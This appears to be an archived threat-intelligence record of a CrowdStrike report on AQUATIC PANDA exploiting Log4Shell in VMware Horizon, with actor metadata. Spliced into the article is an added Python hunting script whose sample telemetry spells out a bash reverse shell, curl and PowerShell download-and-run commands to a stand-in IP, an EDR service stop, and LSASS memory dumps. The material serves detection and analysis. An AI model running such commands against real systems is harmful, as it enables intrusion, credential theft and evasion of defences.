{
	"id": "7e85fd4a-e6e5-4987-9d61-6abd05fc2682",
	"created_at": "2026-04-06T00:21:20.529175Z",
	"updated_at": "2026-04-10T03:34:51.681947Z",
	"deleted_at": null,
	"sha1_hash": "d40c26ee51639e6191e332eeb6430cf3c5ade68e",
	"title": "AQUATIC PANDA in Possession of Log4Shell Exploit Tools | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1988147,
	"plain_text": "AQUATIC PANDA in Possession of Log4Shell Exploit Tools | CrowdStrike\r\nBy Benjamin Wiley and the Falcon OverWatch Team\r\nArchived: 2026-04-05 18:15:07 UTC\r\nFollowing the Dec. 9, 2021, announcement of the Log4j vulnerability, CVE-2021-44228, CrowdStrike Falcon® OverWatch™ has provided customers with unrivaled protection and 24/7/365 vigilance in the face of heightened uncertainty.\r\nTo OverWatch, Log4Shell is simply the latest vulnerability to be exploited — a new access vector among a sea of many others. Adversary behavior after exploitation remains substantially unchanged, and it is this behavior that OverWatch threat hunters are trained to detect and disrupt. OverWatch’s human-driven hunting workflows and patented tooling make it uniquely agile in the face of rapidly evolving cyber threats.\r\nSince the vulnerability was announced, OverWatch threat hunters have been continuously ingesting the latest insights about the Log4j vulnerability, as well as publicly disclosed exploit methods, to inform their continuous hunting operations. On Dec. 14, 2021, VMware issued guidance around elements of VMware’s Horizon service found to be vulnerable to Log4j exploits. This led OverWatch to hunt for unusual child processes of the VMware Horizon Tomcat web server service during routine operations.\r\nOn the back of this updated hunting lead, OverWatch uncovered suspicious activity stemming from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution, leading to the disruption of an active hands-on intrusion. 
Thanks to the quick action of OverWatch threat hunters, the victim organization received the context-rich alerts they needed to begin their incident response protocol.\r\nOverWatch’s Rapid Notification Process Disrupts AQUATIC PANDA\r\nOverWatch threat hunters observed the threat actor performing multiple connectivity checks via DNS lookups for a subdomain under dns\u003c.\u003e1433\u003c.\u003eeu\u003c.\u003eorg, executed under the Apache Tomcat service running on the VMware Horizon instance. OverWatch has observed multiple threat actors using publicly accessible DNS logging services like dns\u003c.\u003e1433\u003c.\u003eeu\u003c.\u003eorg during exploit attempts, since a vulnerable server that resolves the attacker’s per-target subdomain reveals itself to the attacker-controlled DNS service and so identifies which servers are exploitable.\r\nFigure 1. Initial suspicious reconnaissance commands identified by OverWatch\r\nThe threat actor then executed a series of Linux commands, including attempting to execute a bash-based interactive shell with a hardcoded IP address, as well as curl and wget commands to retrieve threat actor tooling hosted on remote infrastructure. The CrowdStrike Intelligence team later linked the infrastructure to the threat actor known as AQUATIC PANDA. (Read more about AQUATIC PANDA at the end of this post.) The execution of Linux commands on a Windows host under the Apache Tomcat service immediately drew the attention of OverWatch threat hunters. After triaging this initial burst of activity, OverWatch immediately sent a critical detection to the victim organization’s CrowdStrike Falcon® platform and shared additional details directly with their security team.\r\nFigure 2. 
Failed attempts to execute Linux commands on a Windows host\r\nBased on the telemetry available to OverWatch threat hunters and additional findings made by CrowdStrike Intelligence, CrowdStrike assesses that a modified version of the Log4j exploit was likely used during the course of the threat actor’s operations.\r\nFigure 3. Suspected Log4j exploits found in AQUATIC PANDA’s possession\r\nUsing the telemetry discovered through intelligence analysis of the JNDI-Injection-Exploit-1.0.jar file, OverWatch was able to confirm that the same file was released on a public GitHub project on Dec. 13, 2021, as seen in Figure 4 below, and was potentially used to gain access to the vulnerable instance of VMware Horizon, based on follow-on activity observed by OverWatch.\r\nFigure 4. GitHub project with Log4j exploit — hxxps\u003c:\u003e//github\u003c.\u003ecom/dbgee/log4j2_rce\r\nAQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. OverWatch threat hunters also observed an attempt to discover and stop a third-party endpoint detection and response (EDR) service.\r\nOverWatch continued to track the threat actor’s malicious behavior as they downloaded additional scripts and then executed a Base64-encoded command via PowerShell [1] to retrieve malware from their toolkit. OverWatch observed the threat actor retrieve three files with VBS file extensions from remote infrastructure. These files were then decoded using cscript.exe into an EXE, DLL and DAT file respectively. 
Based on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking [2]. Finally, OverWatch observed AQUATIC PANDA make multiple attempts at credential harvesting by dumping the memory of the LSASS process [3] using the living-off-the-land binaries rdrleakdiag.exe and cdump.exe, a renamed copy of createdump.exe. Because the binary was renamed, a detection keyed only on the file name createdump.exe would have missed it; matching on the binary’s original file name in its PE metadata, or on handle access to lsass.exe, is the more robust check. The threat actor used WinRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\\temp\\ directories.\r\nFigure 5. Example command line used in attempted memory dump\r\nFigure 6. Falcon platform telemetry capturing threat actor actions\r\nThroughout the intrusion, OverWatch tracked the threat actor’s activity closely in order to provide continuous updates to the victim organization. Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.\r\nThe discussion globally around Log4j has been intense, putting many organizations on edge. No organization wants to hear about such a potentially destructive vulnerability affecting its networks. It is in these times of great uncertainty that the true value of continuous threat hunting is brought to light. OverWatch searches for evidence of malicious behavior — not adversary entry points. 
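The behavior-based hunting described in this post, as an added example that is not CrowdStrike’s or OverWatch’s own code: a Python pass over constructed process telemetry covering the chain above (shell and downloader children of the Horizon Tomcat service, Linux-style commands on a Windows host, lookups against the DNS logging domain, a Base64-encoded PowerShell command, cscript decoding of VBS files, a service stop, the rdrleakdiag.exe and renamed createdump.exe memory dumps, and WinRAR compression of the dump). The event fields, the Tomcat service image name ws_TomcatService.exe, the command lines, the PID, the URLs and the service name are assumptions; the original_name field stands in for the PE OriginalFilename that EDR telemetry normally records, which is what lets the renamed cdump.exe still be matched to createdump.exe.

```python
# Added example (not CrowdStrike code): behavior-based hunting over constructed
# process telemetry that mirrors the AQUATIC PANDA chain described above.
# The image name ws_TomcatService.exe, the command lines, PID, URLs and the
# service name are assumptions. original_name stands in for the PE
# OriginalFilename an EDR records; it is what ties cdump.exe to createdump.exe.
import base64
from collections import namedtuple

Event = namedtuple('Event', 'parent image original_name cmdline')

TOMCAT = 'ws_tomcatservice.exe'                      # assumed Horizon Tomcat service image
SHELLS = {'cmd.exe', 'powershell.exe', 'bash.exe', 'sh.exe'}
DOWNLOADERS = {'curl.exe', 'wget.exe', 'certutil.exe', 'bitsadmin.exe'}
LINUX_TOKENS = {'bash', 'curl', 'wget', 'chmod'}     # matched as whole tokens only
DNS_LOGGERS = ('dns.1433.eu.org',)                   # public DNS-logging domain named above
DUMPERS = {'rdrleakdiag.exe', 'createdump.exe', 'procdump.exe'}
ARCHIVERS = {'rar.exe', 'winrar.exe', '7z.exe'}
SERVICE_STOPPERS = ('sc stop', 'net stop', 'taskkill')

# Constructed payload and its -EncodedCommand form (base64 over UTF-16LE, not UTF-8).
PS_PAYLOAD = 'IEX (New-Object Net.WebClient).DownloadString(http://203.0.113.5/s.ps1)'
ENC = base64.b64encode(PS_PAYLOAD.encode('utf-16le')).decode('ascii')

# Constructed sample telemetry, not real Falcon data.
EVENTS = [
    Event('services.exe', 'ws_TomcatService.exe', 'ws_TomcatService.exe', 'ws_TomcatService.exe'),
    Event('ws_TomcatService.exe', 'cmd.exe', 'cmd.exe', 'cmd.exe /c nslookup h1.dns.1433.eu.org'),
    Event('ws_TomcatService.exe', 'cmd.exe', 'cmd.exe', 'cmd.exe /c bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'),
    Event('ws_TomcatService.exe', 'cmd.exe', 'cmd.exe', 'cmd.exe /c curl -o /tmp/a.sh http://203.0.113.5/a.sh'),
    Event('cmd.exe', 'whoami.exe', 'whoami.exe', 'whoami /all'),
    Event('cmd.exe', 'powershell.exe', 'powershell.exe', 'powershell.exe -nop -w hidden -enc ' + ENC),
    Event('cmd.exe', 'cscript.exe', 'cscript.exe', 'cscript.exe C:/ProgramData/dec.vbs'),
    Event('cmd.exe', 'sc.exe', 'sc.exe', 'sc stop ThirdPartyEdrSvc'),
    Event('cmd.exe', 'rdrleakdiag.exe', 'rdrleakdiag.exe', 'rdrleakdiag.exe /p 652 /o C:/ProgramData /fullmemdmp'),
    Event('cmd.exe', 'cdump.exe', 'createdump.exe', 'cdump.exe -u -f C:/ProgramData/lsass.dmp 652'),
    Event('cmd.exe', 'rar.exe', 'rar.exe', 'rar a -hp C:/ProgramData/d.rar C:/ProgramData/lsass.dmp'),
    Event('explorer.exe', 'notepad.exe', 'notepad.exe', 'notepad.exe'),      # benign noise
]


def decode_powershell(cmdline):
    # Returns the decoded -EncodedCommand text, or None if there is none or it is malformed.
    parts = cmdline.split()
    for i, p in enumerate(parts[:-1]):
        if p.lower() in ('-enc', '-encodedcommand', '-e', '-ec'):
            try:
                return base64.b64decode(parts[i + 1]).decode('utf-16le')
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def hunt(events):
    # Returns (rule, image, detail) tuples in telemetry order; one event can hit several rules.
    findings = []
    for ev in events:
        parent, image = ev.parent.lower(), ev.image.lower()
        orig, cl = ev.original_name.lower(), ev.cmdline.lower()
        tokens = cl.split()
        if parent == TOMCAT and image in SHELLS | DOWNLOADERS:
            findings.append(('tomcat_child_shell', image, ev.cmdline))
        if image in SHELLS and (LINUX_TOKENS & set(tokens) or any(t.startswith('/dev/tcp') for t in tokens)):
            findings.append(('linux_cmd_on_windows', image, ev.cmdline))
        if any(d in cl for d in DNS_LOGGERS):
            findings.append(('dns_logger_callback', image, ev.cmdline))
        if image == 'powershell.exe':
            decoded = decode_powershell(ev.cmdline)
            if decoded:
                findings.append(('encoded_powershell', image, decoded))
        if image == 'cscript.exe' and '.vbs' in cl:
            findings.append(('vbs_decode_stage', image, ev.cmdline))
        if any(s in cl for s in SERVICE_STOPPERS):
            findings.append(('service_stop', image, ev.cmdline))
        if orig in DUMPERS:
            # Key on the original file name, so a renamed createdump.exe is still caught.
            rule = 'renamed_lolbin_dumper' if image != orig else 'lolbin_dumper'
            findings.append((rule, image, ev.cmdline))
        if image in ARCHIVERS and '.dmp' in cl:
            findings.append(('dump_archived', image, ev.cmdline))
    return findings


if __name__ == '__main__':
    for rule, image, detail in hunt(EVENTS):
        print(rule, image, detail, sep=' | ')
```

The Tomcat child-process rule is the one that corresponds to the hunting lead this post starts from; the other rules key on the follow-on behavior rather than on the Log4j entry point, which is why they would still fire if the same actor came in through a different vulnerability. Keying the dump rule on the original file name rather than the on-disk name is what handles the renamed cdump.exe case.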
Although new vulnerabilities present adversaries with a new entry vector, they do not change the hands-on-keyboard activity OverWatch threat hunters are trained to detect and disrupt.\r\nTo stay current on how to protect against this latest vulnerability, see CrowdStrike’s overall mitigation advice for Log4j, which is being updated as new information comes to light.\r\nAQUATIC PANDA is a China-based targeted intrusion adversary with a dual mission of intelligence collection and industrial espionage. It has likely operated since at least May 2020. AQUATIC PANDA operations have primarily focused on entities in the telecommunications, technology and government sectors. AQUATIC PANDA relies heavily on Cobalt Strike, and its toolset includes the unique Cobalt Strike downloader tracked as FishMaster. AQUATIC PANDA has also been observed delivering njRAT payloads to targets.\r\nEndnotes\r\n1. Learn more about this technique at https://attack.mitre.org/techniques/T1132/001/ and https://attack.mitre.org/techniques/T1059/001/.\r\n2. Learn more about this technique at https://attack.mitre.org/techniques/T1574/001/.\r\n3. 
Learn more about this technique at https://attack.mitre.org/techniques/T1003/001/.\r\nAdditional Resources\r\nVisit the CrowdStrike Log4j Vulnerability Learning Center.\r\nAccess the CrowdStrike Archive Scan Tool (CAST).\r\nDownload the CrowdStrike Log4j Quick Reference Guide.\r\nLearn about the powerful, cloud-native CrowdStrike Falcon® platform.\r\nGet a full-featured free trial of CrowdStrike Falcon® Prevent™ to see for yourself how true next-gen AV performs against today’s most sophisticated threats.\r\nSource: https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/"
	],
	"report_names": [
		"overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "19935e32-f1a5-462d-8934-8b1c3bf3b5f2",
			"created_at": "2022-10-25T16:07:23.36465Z",
			"updated_at": "2026-04-10T02:00:04.565476Z",
			"deleted_at": null,
			"main_name": "Aquatic Panda",
			"aliases": [
				"G0143"
			],
			"source_name": "ETDA:Aquatic Panda",
			"tools": [
				"Agentemis",
				"Bladabindi",
				"Cobalt Strike",
				"CobaltStrike",
				"Fishmaster",
				"JollyJellyfish",
				"Jorik",
				"cobeacon",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ba3eea09-ce30-4cfa-ae3a-b5992c4b81f8",
			"created_at": "2022-10-25T15:50:23.441443Z",
			"updated_at": "2026-04-10T02:00:05.263145Z",
			"deleted_at": null,
			"main_name": "Aquatic Panda",
			"aliases": [
				"Aquatic Panda"
			],
			"source_name": "MITRE:Aquatic Panda",
			"tools": [
				"Wevtutil",
				"Winnti for Windows",
				"njRAT",
				"Cobalt Strike",
				"ShadowPad",
				"Winnti for Linux"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434880,
	"ts_updated_at": 1775792091,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d40c26ee51639e6191e332eeb6430cf3c5ade68e.pdf",
		"text": "https://archive.orkl.eu/d40c26ee51639e6191e332eeb6430cf3c5ade68e.txt",
		"img": "https://archive.orkl.eu/d40c26ee51639e6191e332eeb6430cf3c5ade68e.jpg"
	}
}